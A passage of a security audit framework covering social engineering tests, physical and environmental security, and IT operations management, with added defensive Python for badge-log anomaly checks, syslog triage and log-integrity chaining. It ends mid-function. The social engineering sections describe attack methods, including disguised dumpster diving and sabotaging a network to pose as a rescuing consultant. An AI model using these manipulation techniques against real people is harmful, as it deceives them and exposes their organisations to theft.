An auditor should examine the classification levels for all kinds of information generated and processed in the organization. Employee personal information must be classified by the company as sensitive, and if this data has to be discarded, the pages must be shredded before being thrown away.
Analysis/Conclusion/Observation
Dumpster diving is not a clean job for an auditor, but a persistent attacker can use this technique to acquire information which can later be used to compromise the security of a company/organization.
This technique is old fashioned and is easily countered by locking the company's/organization's dumpsters and/or putting them under surveillance to see who is searching through them.
Countermeasures
• Lock the company/organization dumpsters with good locks.
• Put a spotlight on the dumpster area so that it is well lit even at night.
• Use paper shredders in the company's/organization's offices, so that any source of sensitive information thrown away is hard to use for a potential intruder searching the company dumpsters for information.
Tool[s]
A bag to hold the materials gathered, a flashlight, maybe even a small disguise: fake glasses, perhaps a wig.
Remarks
A "messy" job for an auditor, but a necessary one if the information gathered this way will be valuable for further increasing the level of access in the audited company/organisation.
9.6 REVERSE SOCIAL ENGINEERING
Description
This is one of the more difficult types of social engineering attack: the attacker creates a persona of a person in authority. Once that is established, the attacker calls the victims and offers help with an imaginary problem. It is a unique type of attack in that information can be stolen without the victims knowing that their information has been compromised. For example, an attacker could cause a breakdown in the victim's network and then pretend to be a consultant who can solve the problem; in doing so, the attacker could steal significant information from the victim network without the victim's knowledge.
It is difficult to set guidelines for the auditor to carry out this type of test, and the auditor may have to use his/her imagination and knowledge of the organization's processes to carry it out.
There are no direct controls against this type of attack; it is the combined security processes of the organization, including but not restricted to physical security, helpdesk procedures and vendor outsourcing policies, that act as a deterrent to reverse social engineering attacks.
Analysis/Conclusion/Observation
Reverse social engineering is the most effective type of social engineering. The victims will not even know they were misled into giving sensitive information to an outsider. It is also the hardest type of attack to detect and prevent.
Countermeasures
Good policies are needed for any urgent situation that may arise, designating the persons in charge of dealing with urgent issues relating to security in the company/organisation.
All employees also need a good understanding of this danger and of what they must know to prevent this type of attack.
Tool[s]
No specific tools needed, but very good knowledge of the audited company's/organisation's environment, very good people skills and, basically, a good and as-realistic-as-possible plan to carry out.
Remarks
Reverse social engineering is not an easy social engineering technique. Only experienced auditors who have run many social engineering sessions and successfully exploited the levels of trust in a company will be able to use this way of getting sensitive information about the audited company/organization.
9.7 GLOBAL COUNTERMEASURES
• Social engineering is a big issue for any company. The security of the company/organization can easily be compromised through social engineering sessions.
• People are the weakest link in the security chain of any company/organization. Whoever, auditor, attacker or other, knows how to exploit the people of the company/organization they target has a very big advantage and can possibly get any information needed to further compromise the target.
• Every company must have internal policies covering this type of attack. Employees must be aware of these attacks and must be trained internally so that they can spot them and not fall victim to them.
• Every company must also keep all its sensitive information in a secure place, and must have strict internal rules on the misuse of company information. Persons who can easily be misled into giving out information that could lead to a security compromise must not be trusted to handle sensitive company information.
• Every high-ranking employee must know how to protect himself against this kind of attack. Because attackers often target persons with high-level access in the company, senior employees must keep any information they could leak secure at all times.
• To prevent social engineering attacks, a company/organisation must know how to keep all its information secure, and all the factors that lead to a successful social engineering attack must be countered.
• In the end, good information and good knowledge of these techniques are what matter most for detecting, countering and preventing social engineering attacks and all the ways they pose a danger to the security of any company/organisation.
9.8 FURTHER READING[S]
“The Art of Deception” – Mitnick, Kevin & Simon, William L.
10 PHYSICAL SECURITY ASSESSMENT
Description
Proper Physical & Environmental Security ensures that access to systems hardware &
other elements vital for systems functioning like the electric power service, the air
conditioning and heating plant, telephone and data lines, backup media and source
documents is controlled. This also ensures maintaining the proper environment for
optimal systems performance through cooling & humidification.
Objective
[Text]
Write objective of this document not purpose of device (e.g. Router, Firewall, IDS)
Requirement
[Text]
• Understand Organization's environment
• Technical Requirements
Expected Result
10.1 METHODOLOGY
• Review of Access Control System
• Fire Protection
• Environmental Control
• Interception of Data
10.2 REVIEW OF ACCESS CONTROL SYSTEM
Description
Objective
Expected Results
Pre-requisites
Process
• Barriers
• Guards
• PACS
• CCTV Monitoring
• Employee Training
10.2.1 Barriers
Review whether there are adequate barriers in and around the facility to restrict the uncontrolled movement of personnel and data. Barriers can take the form of walls, partitions, perimeter fences, etc.
10.2.2 Guards
Review whether the security guards challenge personnel entering sensitive areas.
10.2.3 PACS
Check whether a Physical Access Control System is deployed that controls the access of personnel to sensitive areas. The PACS may be proximity-card or magnetic-card based, or even biometric (e.g. fingerprint identification). The PACS should ideally be centralised, and personnel should be granted access only to the areas they require and only on adequate approval from their managers. The logs of all PACS should be monitored for violations. Anomalous activity should be recorded, investigated and, if necessary, escalated to the relevant authority.
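The daily verification of card-access records for the workstation room called for in 9.2.5 and the PACS log monitoring called for here both come down to the same routine: a pass over the badge log that turns raw events into a short list a human should investigate. The following Python script is an added example, not ISSAF code or any vendor's tooling. The log format, door names, badge IDs, the manager-approved access list, the working hours and the denial-burst threshold are all constructed assumptions; a real controller export needs its own parser. It flags four things the text implies but does not spell out: bursts of denied attempts (a lost or cloned badge being tried), grants at a door the badge was never approved for (a PACS misconfiguration), after-hours entry, and entry to an inner area with no perimeter record that day (tailgating or an unlogged door).

```python
"""Anomaly checks over physical access control (PACS) badge logs.

Added example (not ISSAF code). The log format, door names, badge IDs and
the approval list are constructed for illustration; a real controller
export will need its own parser.
"""
from collections import defaultdict
from datetime import datetime, time

# Constructed one-day export: timestamp, badge, door, result.
SAMPLE_LOG = """\
2024-03-04T08:02:11 B1021 LOBBY GRANTED
2024-03-04T08:03:40 B1021 WS-ROOM GRANTED
2024-03-04T08:05:02 B2044 WS-ROOM DENIED
2024-03-04T08:05:09 B2044 WS-ROOM DENIED
2024-03-04T08:05:15 B2044 WS-ROOM DENIED
2024-03-04T08:05:22 B2044 WS-ROOM DENIED
2024-03-04T12:30:00 B3077 SERVER-ROOM GRANTED
2024-03-04T17:45:00 B3077 LOBBY GRANTED
2024-03-04T23:14:05 B1021 SERVER-ROOM GRANTED
"""

# Areas each badge has been approved for by a manager (constructed).
APPROVED = {
    "B1021": {"LOBBY", "WS-ROOM"},
    "B2044": {"LOBBY"},
    "B3077": {"LOBBY", "WS-ROOM", "SERVER-ROOM"},
}
PERIMETER_DOOR = "LOBBY"              # every inner door should be preceded by this one
WORK_HOURS = (time(7, 0), time(20, 0))
DENIED_BURST_COUNT, DENIED_BURST_SECONDS = 3, 60


def parse_log(text):
    """Parse the export into (timestamp, badge, door, result) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, badge, door, result = line.split()
            events.append((datetime.fromisoformat(ts), badge, door, result))
    return sorted(events)


def find_anomalies(events):
    """Return (timestamp, badge, kind, door) findings worth investigating."""
    findings = []
    recent_denials = defaultdict(list)   # badge -> denial timestamps inside the window
    perimeter_seen = set()               # (badge, date) that entered via the perimeter door
    for ts, badge, door, result in events:
        if result == "DENIED":
            window = [t for t in recent_denials[badge]
                      if (ts - t).total_seconds() <= DENIED_BURST_SECONDS] + [ts]
            recent_denials[badge] = window
            if len(window) == DENIED_BURST_COUNT:   # report once per burst
                findings.append((ts, badge, "denied-burst", door))
            continue
        # A grant at a door the badge was never approved for points at a
        # PACS misconfiguration rather than at the badge holder.
        if door not in APPROVED.get(badge, set()):
            findings.append((ts, badge, "unapproved-grant", door))
        if not WORK_HOURS[0] <= ts.time() <= WORK_HOURS[1]:
            findings.append((ts, badge, "after-hours", door))
        if door == PERIMETER_DOOR:
            perimeter_seen.add((badge, ts.date()))
        elif (badge, ts.date()) not in perimeter_seen:
            # Inside without a perimeter record: tailgating or an unlogged door.
            findings.append((ts, badge, "no-perimeter-entry", door))
    return findings


if __name__ == "__main__":
    for ts, badge, kind, door in find_anomalies(parse_log(SAMPLE_LOG)):
        print(f"{ts:%H:%M:%S} {badge:6} {kind:20} {door}")
```

On the constructed log this yields four findings: the burst of denials by B2044, B3077 inside the server room before any lobby entry, and B1021 in the server room at 23:14 both outside hours and outside its approved areas. The approval list is what ties the check back to the management sign-off the text requires; without it, the log can only tell you that the controller did what it was configured to do, not whether that configuration was ever authorised.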
10.2.4 CCTV Monitoring
CCTV (Closed Circuit Television) monitoring can be used to watch all entries and exits of sensitive areas from a single location. Coverage should preferably include emergency exits, which can be a source of unauthorised entry. Dedicated personnel may monitor the CCTV system and raise an alert on suspicious activity. Some cameras work with motion sensors that track movement in their coverage area; when there is movement, the screen at the monitoring end is updated. Tapes or video must be preserved for long periods so that historical events can be traced.
10.2.5 Employee Training
All employees must be trained in the physical security aspects, and they should challenge visitors accessing sensitive areas without proper authorisation and escort.
10.3 FIRE PROTECTION
Fire detection equipment is required to detect a fire quickly so that it can be extinguished. It is also important to pinpoint the location of the fire accurately.
Process
• Fire Detection Systems
• Fire Suppression Equipment
• Fire Extinguishers
10.3.1 Fire Detection Systems
Smoke detectors and heat sensors should be used to detect the presence of a fire, and these in turn should be connected to a centralised alarm system. Smoke detectors and heat sensors catch a fire at a nascent stage, which is very helpful in suppressing it. The alarm system should help pinpoint the area of the fire so that adequate action can be taken to suppress it. The fire alarm panel should be located at a place that is attended by personnel round the clock. Employees must also be trained to respond to fire alarms and evacuate when necessary.
10.3.2 Fire Suppression Equipment
Various types of fire suppression equipment, gas or water based, are available and should be deployed. Among the gas-based suppression systems that replace Halon-based systems are FM-200 (HFC-227ea), CEA-410 or CEA-308, NAF S-III (HCFC Blend A), FE-13 (HFC-23), Argon (IG-01) or Argonite (IG-55), and Inergen (IG-541). Water-based suppression systems may be "dry pipe" or "closed head" systems that use sprinklers to suppress fires. Water-based systems are generally not very suitable where expensive electronic computer equipment is present, such as server rooms. The suppression systems can be integrated directly with the alarm systems so that they are activated the moment a fire is detected.
10.3.3 Fire Extinguishers
Portable extinguishers (powder based/CO2 based) must be placed at easily accessible points for use in fire emergencies. These extinguishers must be regularly serviced and the pressure of the extinguishing medium checked. Employees must also be trained in the use of fire extinguishers.
10.4 ENVIRONMENTAL CONTROL
HVAC (Heating, Ventilation and Air Conditioning), in short maintaining the environment, is very important from a systems availability perspective.
Process (Steps to complete this Process/Task/Test Case)
• Air Conditioning & Humidity Control
• Water Detection
• UPS & Power Conditioning
• Interference
10.4.1 Air Conditioning & Humidity Control
There must be a centralised system that controls the air temperature through thermostats. Air temperature can be maintained at 22-24 degrees Celsius in normal working areas and 15-23 degrees Celsius in computer/server rooms. Humidity should be maintained at 40-60%. This is important for optimal functioning of the equipment, as higher or lower temperatures may damage electronic circuits. Similarly, if the humidity level drops, the dry atmosphere may generate static charges that can permanently damage electronic circuits. Temperature and humidity should be controlled by an integrated alarm system that is continuously monitored.
10.4.2
Water Detection
Plumbing leaks can flood equipment rooms. Utmost care must be taken to route the
plumbing system away from the areas where the data centres are located. Optionally, a
water detection system may be installed under the raised floor of a data centre so that
water is detected before it reaches the equipment and adequate action can be taken to
stop the flow.
10.4.3
UPS & Power Conditioning
Electrical surges and spikes are among the most frequent causes of critical equipment
failure. Surge suppression equipment must be deployed to condition the power to the
required voltage and frequency. Uninterruptible power supplies (UPS) must be used to
ensure continuous power to critical equipment. Electrical power may be taken from
multiple service providers so that there is no dependency on a single provider. For
prolonged power cuts, backup generator sets should be used to keep the systems
supplied.
10.4.4
Interference
Electromagnetic interference (EMI) can severely hamper communications. If high-voltage
power cables run very close to network communication cables, the interference
generated by the power cables can cause errors in data communication, resulting in
degraded performance. Power and data cabling should therefore be routed in separate
trays or ducts, or shielded cable used where separation is not possible.
COUNTERMEASURES
Contributors
Links
10.5 INTERCEPTION OF DATA
Depending on the type of data a system processes, there may be a significant risk if the
data is intercepted. There are three routes of data interception: direct observation,
interception of data transmission, and electromagnetic interception.
Objective
Expected Results
Pre-requisites
Process
• Data Observation
• Interception of Data
• Electromagnetic Interception
10.5.1
Data Observation
Critical computer systems that display sensitive information on their screens must be
kept in protected (sensitised) areas, and their displays must not be visible to anyone
outside that area. For example, if a system on which significant merger-related
information is processed is located near a window, the data may be visible to someone
just across the street who can see the screen.
10.5.2
Interception of Data
Data passing through communication networks may be tapped. If various organisations
in a single building share common cable ducts that are not secured, an attacker posing
as a tenant using the same duct could tap the cables and access vital information
passing in and out of the organisation. Cables therefore need to be properly secured
while passing through common ducts.
10.5.3
Electromagnetic Interception
Computers emanate electromagnetic radiation while processing information. An attacker
using an antenna and a receiver can monitor and recover classified or sensitive
information as it is being processed, without the user being aware that a loss is
occurring. This class of data interception is also known as TEMPEST.
These attack methods are very complex, and the organisation should consider the
financial implications before implementing TEMPEST shielding mechanisms that block
electromagnetic radiation.
10.6 GLOBAL COUNTERMEASURES
10.7 FURTHER READINGS
11 ENTERPRISE SECURITY OPERATIONS MANAGEMENT
The implementation of a comprehensive information security management framework
includes both technical and manual security processes, which need to be aligned with
each other to ensure that security is managed completely. Operations management
includes the management of the IT administration and service delivery processes of the
enterprise. A review of IT operations is an essential part of any security framework
assessment: it verifies that the security operational processes supporting the
information security management of the enterprise are appropriately implemented and
adhered to, so that the controls and security measures actually meet the enterprise's
information risk management objectives.
11.1.1
Capacity Management
Capacity Management relates to the management of IT infrastructure capacity to ensure
continuous availability of the technology infrastructure of the enterprise. This typically
involves managing the capacity of hardware and software components so that no
business activity is disrupted by technological capacity restrictions. Such activities
include:
• Review and ensure that appropriate processes exist for planning and acquiring new
systems, system upgrades or new versions of systems, considering the capacity
requirements of the enterprise
• Assess whether capacity usage is constantly monitored, both to ensure availability of
IT services and to detect unauthorised activity in the IT environment. This is
particularly important given the risk of DoS or similar attacks being executed against
the enterprise's infrastructure: an unexplained jump in bandwidth, connection count or
CPU load is often the first visible symptom of such an attack.
• Ensure that capacity monitoring and planning cover all components of the technology
infrastructure of the enterprise, such as hardware, software and networking
Domain
Capacity Management
Introduction
Capacity management ensures that IT resources are used efficiently with regard to
availability. It ensures appropriate disk quotas, response times, and processing, network
and system capacity.
Prerequisite
• Statistical reports from capacity utilisation trend monitoring processes
• Stress testing reports on systems, applications and network components
• Volume capacity document
• Tools for stress, volume and capacity testing
Objective
• To identify gaps against the minimum baseline standard
• To assess the capacity of systems, applications and network components
Evaluation Check (for each item record Yes / No / N/A, the evaluation performed and
the results)
1. Is there a policy and process for capacity management? If so, is it available for
review?
2. Do the policy and process for capacity management ensure that the minimum
standards stated in the service level agreements are fulfilled?
3. Does the capacity management process cover all critical components?
4. Does the organisation predict resource bottlenecks related to business needs?
5. Are capacity and availability plans established based on service level agreements?
6. Is there a process to test new software for performance and capacity before
implementing it?
11.1.2
Vulnerability Management
Vulnerability Management relates to the management of vulnerabilities in the
applications, databases and system software in use within an enterprise. The need for a
structured and managed vulnerability management process stems from the technology
infrastructure implemented within the enterprise and the security or control lapses
inherent in such software. The process of vulnerability management involves the
identification, monitoring and patch management of vulnerabilities in the specific
technologies in use. The typical activities of the
11.1.3
Release Management
Release Management comprises the management of changes to the information
technology environment of the enterprise. This includes the management of changes in
respect of the following:
11.1.3.1
PATCH MANAGEMENT
• Patches are obtained from authorised sources only, and their integrity is verified
(vendor signature or published checksum) before use
• Patches are appropriately tested in a test environment prior to application to the
production environment
• Patches are applied on a risk-assessed need basis rather than solely because the
vendor has released them; security patches for exposed systems should be prioritised,
not deferred
• Patches are adequately monitored
Domain
Patch Management
Introduction
Patch management covers the tools/utilities, policies and processes for keeping systems
current with the software updates that are released after the software has shipped.
Proactive security patch management is essential to keep the enterprise environment
secure and reliable. A patch management process covers configuration changes and the
application of software updates, and provides recommendations to safeguard the
systems concerned.
Prerequisite
Documents related to identifying new patches and vulnerabilities, patch testing and
patch implementation.
Objective
To evaluate the patch management process of the enterprise.
Evaluation Check (for each item record Yes / No / N/A, the evaluation performed and
the results)
1. Does the organisation have an explicit and documented policy and process for
handling patches?
2. Do the patching policy and process specify what techniques the organisation uses to
monitor for new patches and vulnerabilities, and who is responsible for that
monitoring?
3. Does the organisation have a methodology for testing and secure implementation of
patches?
4. Does the patch management process define which patches are implemented first,
and on which systems?
5. Does the methodology for handling patches include:
• An inventory of all systems in the organisation
• Vulnerability and patch monitoring
• Patch prioritisation techniques
• Patch testing
• Patch management training
• Automatic patch implementation
11.1.3.2
CONFIGURATION MANAGEMENT
Configuration management relates to the management of:
• The configurations of all hardware devices/components
• Operating systems and application software, firmware components, physical and
logical network addresses, the connecting circuit numbers of Internet connectivity, and
the network architecture
All of these should be adequately documented and maintained, so that an unauthorised
change can be recognised as a deviation from the recorded baseline.
11.1.3.3
CHANGE MANAGEMENT
Domain
Change Management
Introduction
The change management process ensures that the integrity of the production
environment is maintained. It ensures that only authorised and adequately tested
programs are migrated into the production environment.
Prerequisite
Objective
Evaluation Check (for each item record Yes / No / N/A, the evaluation performed and
the results)
1. Is there a formal technical change management procedure in place? If so, is it
available for review?
2. Are all changes aligned with the company's standard configuration management
procedure?
3. Are all emergency changes embedded in the centralised technical change
management process?
4. Is the production environment separate from the development and staging
environments?
5. Are changes formally submitted and implemented by personnel?
6. Is segregation of duties followed by users, and by the staff responsible for making
changes to the production environment?
11.1.4
Enterprise Incident Management
Enterprise Incident Management relates to the identification, investigation and resolution
of security incidents related to the information systems infrastructure of an enterprise.
The philosophy of incident management requires that all incidents, irrespective of their
criticality, are logged and investigated to ensure that they do not pose a security risk to
the enterprise. A review of the Enterprise Incident Management processes includes:
• Ensure that the enterprise has adequate infrastructure and processes to identify and
record all system events
• Ensure events are logged, investigated, escalated and resolved in accordance with
the information security policies of the enterprise
• Event logs include the following at a minimum:
- Security device logs (firewall, IDS, IPS etc.)
- Network device logs
- Server logs (applications, databases, OS, email, web server, proxy server, SMTP
servers)
- Secure transmission and storage of event logs
• Ensure that monitoring procedures provide for appropriate escalation procedures
• Ensure logs are monitored on a daily, weekly or monthly basis as applicable
• Ensure events are appropriately classified as Security Incidents (unauthorised access
attempts at server and client level, IDS event logs of attempted connections) or
Operational Events (abnormal information systems events such as abnormal
termination, errors, failures, connectivity issues, etc.)
• Ensure the process provides for taking the necessary actions to prevent recurrence of
security incidents through appropriate measures
• Security Incidents are routed to the Security Incident Management process (11.1.4.3)
• Operational Events are routed to the Operations Event Management process (11.1.4.4)
11.1.4.1
LOGGING
Logging is one of the most important activities related to monitoring information
systems security within an enterprise. It involves logging all occurrences of events
(whether authorised or unauthorised, normal or abnormal) within the information
systems of the enterprise. These event logs then form the basis for review and
assessment to identify events with a security implication for the enterprise. The review
of logging must ensure that the following activities are conducted at a minimum:
• Review the incident management procedures of the enterprise and ensure that all
technology events are appropriately recorded in a central database, either using
automated solutions such as enterprise management systems or through a helpdesk
function.
• Ensure that the incident management procedures require the central events
database to be reviewed to distinguish normal operational events from potential
security events. Such reviews should route normal operational events to the IT
operations staff for resolution, and potential security events to the Chief Information
Security Officer and their team for investigation and resolution.
• Assess whether the process for incident reporting requires that all system faults or
suspected system faults are reported and logged.
• Ensure helpdesk logs are periodically reviewed to confirm that all reported faults
have been satisfactorily resolved and the helpdesk call closed.
• Ensure fault resolutions are reviewed to confirm that information security and
controls have not been compromised in the process of implementing them.
• Review that audit logs have been activated on critical technology components such
as servers, applications, databases and network devices, and ensure that these logs
produce meaningful information that can be used in investigating security events (at a
minimum a synchronised timestamp, the source host, the account or process involved
and the outcome of the action).
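The classification and routing described in 11.1.4 and in the logging bullets above, as an added example that is not part of the ISSAF text: a small Python triage over constructed syslog-style lines (hosts, addresses and messages are invented for this illustration) that labels each event a Security Incident or an Operational Event, attaches the route the framework prescribes, and escalates repeated failed logins from one source as a single incident rather than five separate noise events. The rule set, the five-attempt threshold and the routing strings are assumptions for illustration; a real deployment would draw them from the enterprise's own definitions document.

```python
import re
from collections import defaultdict

# Constructed sample of lines from a central event store (syslog format).
# Hosts, addresses and messages are invented for this example.
SAMPLE_EVENTS = """\
Mar 12 08:01:02 srv01 sshd[2210]: Failed password for root from 203.0.113.7 port 50112 ssh2
Mar 12 08:01:05 srv01 sshd[2210]: Failed password for root from 203.0.113.7 port 50114 ssh2
Mar 12 08:01:09 srv01 sshd[2210]: Failed password for admin from 203.0.113.7 port 50120 ssh2
Mar 12 08:01:13 srv01 sshd[2210]: Failed password for oracle from 203.0.113.7 port 50131 ssh2
Mar 12 08:01:20 srv01 sshd[2210]: Failed password for backup from 203.0.113.7 port 50140 ssh2
Mar 12 08:02:41 fw01 kernel: DROP IN=eth0 SRC=198.51.100.9 DST=10.0.0.5 PROTO=TCP DPT=3389
Mar 12 08:03:00 ids01 snort[991]: [1:2001219:20] ET SCAN Potential SSH Scan {TCP} 203.0.113.7:50200 -> 10.0.0.5:22
Mar 12 08:05:17 db01 oracle[4412]: ORA-00600: internal error code, arguments: [kcbzib_kcrsds_1]
Mar 12 08:06:30 app02 systemd[1]: billing.service: Main process exited, code=killed, status=11/SEGV
Mar 12 08:07:02 srv01 sshd[2301]: Accepted publickey for deploy from 10.0.0.21 port 41020 ssh2
Mar 12 08:08:45 sw03 snmpd[77]: Link down on interface GigabitEthernet1/0/24
"""

# Classic BSD syslog line: timestamp, host, process[pid]: message
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<proc>[^\[:]+)(?:\[\d+\])?: (?P<msg>.*)$"
)

# Security-relevant patterns (11.1.4: unauthorised access attempts, IDS events).
SECURITY_RULES = [
    ("failed_login", re.compile(r"^Failed password for (?P<user>\S+) from (?P<src>[\d.]+)")),
    ("firewall_drop", re.compile(r"^DROP .*\bSRC=(?P<src>[\d.]+)")),
    ("ids_alert", re.compile(r"^\[\d+:\d+:\d+\] (?P<sig>.+?) \{\w+\} (?P<src>[\d.]+):\d+ ->")),
]
# Operational patterns (11.1.4: abnormal termination, errors, failures, connectivity).
OPERATIONAL_RULES = [
    ("app_error", re.compile(r"\bORA-\d{5}\b")),
    ("service_crash", re.compile(r"Main process exited, code=killed")),
    ("link_down", re.compile(r"^Link down on interface (?P<iface>\S+)")),
]

# Where each class goes, as the framework prescribes (wording assumed).
ROUTING = {
    "security": "Security Incident Management (11.1.4.3): ISO / security response team",
    "operational": "Operations Event Management (11.1.4.4): IT operations",
    "informational": "retain only",
}

# Assumed escalation threshold: this many failed logins from one source in the
# reviewed window is treated as a password-guessing attack, not isolated noise.
BRUTE_FORCE_THRESHOLD = 5


def parse_line(line):
    """Split one syslog line into its fields, or return None if it does not parse."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def classify(event):
    """Return (class, kind, extracted details) for a parsed event; security rules win."""
    for kind, rx in SECURITY_RULES:
        m = rx.search(event["msg"])
        if m:
            return "security", kind, m.groupdict()
    for kind, rx in OPERATIONAL_RULES:
        m = rx.search(event["msg"])
        if m:
            return "operational", kind, m.groupdict()
    return "informational", "other", {}


def triage(text):
    """Classify every line of a log extract, attach its route, and escalate brute force."""
    report = {"security": [], "operational": [], "informational": [], "escalations": []}
    failed_by_src = defaultdict(list)
    for line in text.splitlines():
        ev = parse_line(line)
        if ev is None:
            report["informational"].append({"raw": line, "kind": "unparsed", "route": "manual review"})
            continue
        cls, kind, details = classify(ev)
        record = {"ts": ev["ts"], "host": ev["host"], "kind": kind, **details, "route": ROUTING[cls]}
        report[cls].append(record)
        if kind == "failed_login":
            failed_by_src[details["src"]].append(details["user"])
    # Correlate: many failures from one source are one incident, not many events.
    for src, users in failed_by_src.items():
        if len(users) >= BRUTE_FORCE_THRESHOLD:
            report["escalations"].append({
                "src": src,
                "attempts": len(users),
                "accounts": sorted(set(users)),
                "reason": "repeated failed logins from one source",
            })
    return report


if __name__ == "__main__":
    r = triage(SAMPLE_EVENTS)
    for cls in ("security", "operational", "informational"):
        print(f"{cls}: {len(r[cls])} event(s) -> {ROUTING[cls]}")
    for esc in r["escalations"]:
        print("ESCALATE:", esc)
```

Note that a successful key-based login lands in the informational bucket: it is neither an incident nor a fault, but it is kept, because it is exactly the record an investigator needs when the escalated source later turns out to have guessed a password correctly.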
11.1.4.2
MONITORING
Monitoring is the process of continuous review of the event logs of the various technology
components of the enterprise. It involves a review of the audit trails, event logs, incident
logs and helpdesk logs, amongst other logs as applicable to the enterprise. Depending on
the implementation of the logging process (centralised or decentralised) this activity can
be performed by one or many individuals across the enterprise. The most significant
component of the monitoring process is clear responsibility for performing it. The
process necessarily requires the involvement of the Information Security Officer and the
Compliance Manager to ensure that security incidents are identified and appropriate
action is initiated to resolve them.
11.1.4.3
SECURITY INCIDENT MANAGEMENT
The Security Incident Management process stems from the logging and monitoring
processes described above and ensures that identified security incidents are managed in
accordance with the risks they pose to the enterprise. The process must be owned by
the Information Security Officer (ISO) and should at a minimum involve the following:
• Definition of security events/incidents: the formalisation of a definitions document
that identifies all event/incident types that have a security implication and are
considered critical to the enterprise
• Allocation of responsibilities for logging reported events or incidents: this could be
part of the helpdesk function or, in larger enterprises, a dedicated security helpdesk
constituted specifically for handling security events or incidents
• Constitution of a security response team: a team of security personnel who respond
to a reported security event or incident
• Classification of security events or incidents: the classification of security events in
order of their impact on the organisation
• Risk assessment and incident response: the security response team assesses the risk
that an identified security incident poses to the information security of the enterprise.
Depending on the criticality of the risk identified, the security controls to be
implemented are determined. Where the incident requires further investigation,
processes such as computer forensics and investigation are applied.
11.1.4.4
OPERATION EVENT MANAGEMENT
Operations Event Management relates to the process of responding to events that are
operational in nature. Such events stem from the IT infrastructure and technology used
in the enterprise and may comprise routine IT operations events such as abnormal
performance, terminations and poor response, amongst many others.
However, it is extremely important that operational events are also assessed for
security implications, so that any operational event arising from a security violation is
identified and remedied with a response appropriate to a security incident (a service
that crashes repeatedly may be under attack rather than merely buggy). Furthermore,
operational event remediation may itself introduce security flaws and vulnerabilities;
these need to be prevented at the time of remediation so as to reduce the probability of
such vulnerabilities being exploited against the security interests of the enterprise.
To evaluate the security implications, if any, of an operational event, the operations
event management process must route the event to the risk assessment step of
Security Incident Management (refer to 11.1.4.3 Security Incident Management).
11.1.5
User Access Management
User Access Management relates to the process of managing user access to the
information systems of the enterprise. This includes the management of the following:
• New User Creation
• Existing User Access Modifications
• User Access Profile creation and modification
• User Access Termination
A review of the user access management process essentially comprises the following:
• Review of user access policies
• Review of user access management roles and responsibilities
• Review of user access creation, modification and termination for the following:
- Business applications such as ERP
- Enterprise applications such as email
- Access to the local area network
• Review of the process for periodic reviews of user access, to ensure that transitional
processes of the organisation that change job responsibilities do not leave users with
unauthorised access
• Review of the process and results of user access log monitoring, to ensure that
unauthorised activities have been appropriately detected and remedied
11.1.6
Certification and Accreditation
Information systems security is a rapidly changing environment in which new
vulnerabilities and risks are introduced every day, creating a pressing need for constant
monitoring and assessment to ensure that the security management infrastructure of
the enterprise is alert to this challenge and can respond in a manner that appropriately
addresses the technology risks affecting the enterprise.
Given the rapid advancement of technology, enterprises find it difficult to maintain
adequate technological skills, or to sustain the continuous education needed to develop
the expertise internally. As a result, to maintain its information security capabilities, the
enterprise often relies on external parties or dedicated internal groups for the periodic
assessment of its information systems security. Such reviews typically involve the
following:
• Internal IT audit review, comprising reviews of specific areas of IT security performed
by internal resources
• Internal security assessment, comprising technology-specific reviews performed by
specialist IT security personnel
• Third-party information security assurance reviews, comprising security assessments
performed by third-party contractors in areas that require advanced technology and
security specialisation
Accreditation involves benchmarking and reviewing the IT security implementation
within an enterprise against the ISSAF.
11.2 REVIEW OF LOGGING / MONITORING & AUDITING PROCESSES
11.3 LOGGING
11.3.1
Importance of logging & audit events
11.3.1.1
WHAT ARE LOGS?
Logs are simply data recorded during the operation of a program. Logs can contain
usage data, performance data, errors, warnings and operational information. They can
be written to files or databases, either in an easily readable format or in a proprietary
format that must be read using a specific program, and can be stored on the machine
that produced them or on a separate machine.
Most server software today includes some logging mechanism. On Unix systems the
syslog facility is the common channel through which both the kernel and applications
record events.
11.3.1.2
WHY ARE LOGS IMPORTANT?
Logs are often the only way to tell what is happening, or what has happened, on a
system. It is important to identify all programs on all the computers that a business
depends on, and then gather the available log files for analysis as deemed necessary
and when required.
Log files are the only record of the history of what happened within a system. They are
often the only way to detect and trace an intrusion by an attacker, to trace the reason
behind a server failure, to gather data for capacity planning such as adding disk space,
or to determine which web pages were visited by users. Without logs it is very difficult,
if not impossible, to know what is going on in a system.
Logs can be kept on the machine that produces them or stored on a separate logging
machine. Many workstations and servers can send their logs to a centralised (separate)
machine, either by manually copying the log files to the central machine(s) or by
automating the copying process. The log data is then maintained on that central
machine(s). A copy held on a host the attacker does not control is also what makes the
logs trustworthy after a compromise, since an intruder with administrative rights on a
machine can edit or delete its local logs.
Working with logs requires you to:
• Decide which logs to capture.
• Choose an analysis/viewing tool.
• Determine log capture frequency.
• Decide where the logs will be stored (local or remote machine).
• Decide who will monitor the logs and what action will be taken.
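The "secure transmission and storage of event logs" requirement in 11.1.4, and the question of where logs are stored in this section, both come down to being able to prove later that a stored log has not been altered. As an added example that is not part of the ISSAF text, the following Python code keeps a hash chain over log entries with an HMAC key held only by the central collector (the key, the sample lines and the collector/host split are assumptions for illustration); verification detects edited, deleted, inserted or reordered entries, and, when the latest chain head has been recorded out-of-band, truncation as well.

```python
import hashlib
import hmac
import json

# Assumed secret held only by the central log collector (invented for this
# example; in practice keep it in a KMS/HSM, never in source or on the hosts
# whose logs are being protected).
COLLECTOR_KEY = b"example-collector-key-not-for-production"
GENESIS = "0" * 64  # chain anchor for the first entry

# Constructed log lines standing in for records received from hosts.
SAMPLE_LINES = [
    "Mar 12 08:01:02 srv01 sshd[2210]: Failed password for root from 203.0.113.7 port 50112 ssh2",
    "Mar 12 08:02:41 fw01 kernel: DROP IN=eth0 SRC=198.51.100.9 DST=10.0.0.5 PROTO=TCP DPT=3389",
    "Mar 12 08:07:02 srv01 sshd[2301]: Accepted publickey for deploy from 10.0.0.21 port 41020 ssh2",
    "Mar 12 08:08:45 sw03 snmpd[77]: Link down on interface GigabitEthernet1/0/24",
]


def entry_mac(key, prev_mac, seq, line):
    """HMAC-SHA256 binding this line to its sequence number and the previous entry's MAC.
    JSON encoding keeps the three fields unambiguous regardless of their content."""
    payload = json.dumps([prev_mac, seq, line], separators=(",", ":")).encode()
    return hmac.new(key, payload, hashlib.sha256).hexdigest()


def append_entries(key, store, lines):
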